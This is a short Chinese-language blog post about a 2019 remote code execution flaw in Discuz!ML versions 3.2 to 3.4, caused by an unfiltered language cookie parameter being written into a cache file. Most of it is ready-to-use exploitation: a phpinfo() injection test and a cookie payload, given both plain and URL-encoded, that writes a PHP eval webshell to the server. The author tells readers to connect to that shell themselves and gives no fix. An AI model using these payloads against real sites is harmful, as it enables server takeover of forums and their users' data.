discuz x3.4 getshell

  1. 开始
  2. 原理
  3. 漏洞影响版本:
  4. 重点
  5. 例子
  6. payload

开始

2019年7月11日, Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的cookie字段中的language参数处插入构造的payload,进行远程代码执行利用,该漏洞利用方式简单,危害性较大。

原理

由于Discuz! ML对于cookie字段的不恰当处理造成的
cookie字段中的language参数未经过滤,直接被拼接写入缓存文件之中,
而缓存文件随后又被加载,从而造成代码执行

漏洞影响版本:

Discuz!ML v.3.4
Discuz!ML v.3.3
Discuz!ML v.3.2

重点

XXXX_language=

例子

注意其中的:4gH4_0df5_language=en;
修改为:4gH4_0df5_language=’.phpinfo().’;


可以看见phpinfo执行成功了。

payload

XXXX_language=’.phpinfo().’
xxxx自己改

1
2
3
'.+file_put_contents('cx.php',urldecode('<?php  eval($_POST["cx"]);?>')).'
url编码一下
%27.%2bfile_put_contents(%27cx.php%27%2curldecode(%27%3c%3fphp++eval(%24_POST%5b%22cx%22%5d)%3b%3f%3e%27)).%27

写入webshell,自己去连接一句话吧!


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 cxaqhq@qq.com

文章标题:discuz x3.4 getshell

文章字数:240

本文作者:cx

发布时间:2019-10-07, 22:59:00

最后更新:2019-10-07, 23:10:15

目录
×

喜欢就点赞,疼爱就打赏